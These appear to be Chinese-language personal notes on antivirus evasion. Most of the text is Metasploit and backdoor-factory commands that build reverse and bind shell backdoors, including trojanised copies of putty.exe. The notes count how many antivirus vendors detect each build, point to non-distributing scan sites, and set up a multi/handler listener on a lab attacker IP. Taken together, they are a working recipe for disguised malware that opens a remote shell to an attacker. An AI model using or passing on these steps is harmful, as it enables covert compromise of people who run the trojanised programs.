免杀技术
与防病毒厂商共享信息
VirusTotal
https://www.virustotal.com/zh-cn
VirScan
https://virscan.org
黑产在线查杀引擎
https://nodistribute.com
http://viruscheckmate.com扫描网站安全性
http://onlinelinkscan.com
使用msf编码模块生成后门
msfvenom -p windows/shell/bind_tcp LPORT=444 -f exe -o a.exe 21个厂商报毒
增加编码模块
msfvenom -a x86 -p windows/shell/bind_tcp LPORT=444 -e cmd/powershell_base64 -i 9 -f exe -o b.exe 20个厂商报毒
使用编码后效果并不明显,还是很多厂商报毒
使用模板程序隐藏后门,效果比较好
msfvenom -p windows/shell/reverse_tcp lhost=192.168.137.128 lport=444 -x putty.exe -f exe -o c.exe
将后门绑定到putty中,这里用的是反弹shell 注意参数lhost地址填写的是攻击者的IP地址,绑定后putty会报废,如果不想破坏使用 -k 参数
msfvenom -p windows/shell/reverse_tcp lhost=192.168.137.128 lport=444 -x putty.exe -k -f exe -o d.exe
8个厂商报毒
+
payload: 在目标系统执行的代码或指令,使得获取shell
shellcode : 获取shell的code
shell 后门程序
reverser_tcp 反弹shell
bind_tcp 正向shell
meterpreter 更高级的shell,集成了很多脚本,更容易使用
【meterpreter命令】
getuid 当前用户信息
getsystem 提权
help 查看帮助
screenshot
因为msf知名度太大了,做出的免杀指纹早已被杀毒厂商收录了
kali存放着windows下的执行程序目录
/usr/share/windows-binaries/
shellter 每次生成的后门程序代码都不同,动态变化的特征,难以用指纹匹配
后门利用
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.137.128
lhost => 192.168.137.128
msf exploit(multi/handler) > set lport 444
lport => 444
msf exploit(multi/handler) >
msf exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.137.128 yes The listen address
LPORT 444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.137.128:444
乱码将终端编码改成 gbk 或者 gb2312
shllter
veil-framework
backdoor生成的后门曾经很骚,没有一个杀软报毒,在黑帽大会秀了一波,现在不行了,不推荐使用
backdoor-factory 利用代码洞注入后门,不改变体积 code cave
backdoor-factory -f putty.exe -S 检查是否支持注入后门
backdoor-factory -f putty.exe -c -l 100 检查大于100字节的代码洞数量
backdoor-factory -f putty.exe -s show 查看哪些payload可以用
普通注入模式(体积会变大,直接在程序后面加代码)
backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.137.129 -P 444 -a
大小对比
单代码洞注入(体积不会变,需要选择代码洞)
backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.137.129 -P 444 -a
最好选择代码洞比较大的,否则容易导致溢出,所以这里选择1,这里大小反而变小了,理论上应该不变的
使用的时候360杀软报毒了。在线监测有23个厂商报毒,效果不怎样,0day似的
多代码洞注入模式
backdoor-factory -f putty_no.exe -s iat_reverse_tcp_stager_threaded -H 192.168.137.129 -P 444 -J
要选多次代码洞,尽量选大的,不然要选很多次
利用:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 444
set LHOST 192.168.137.129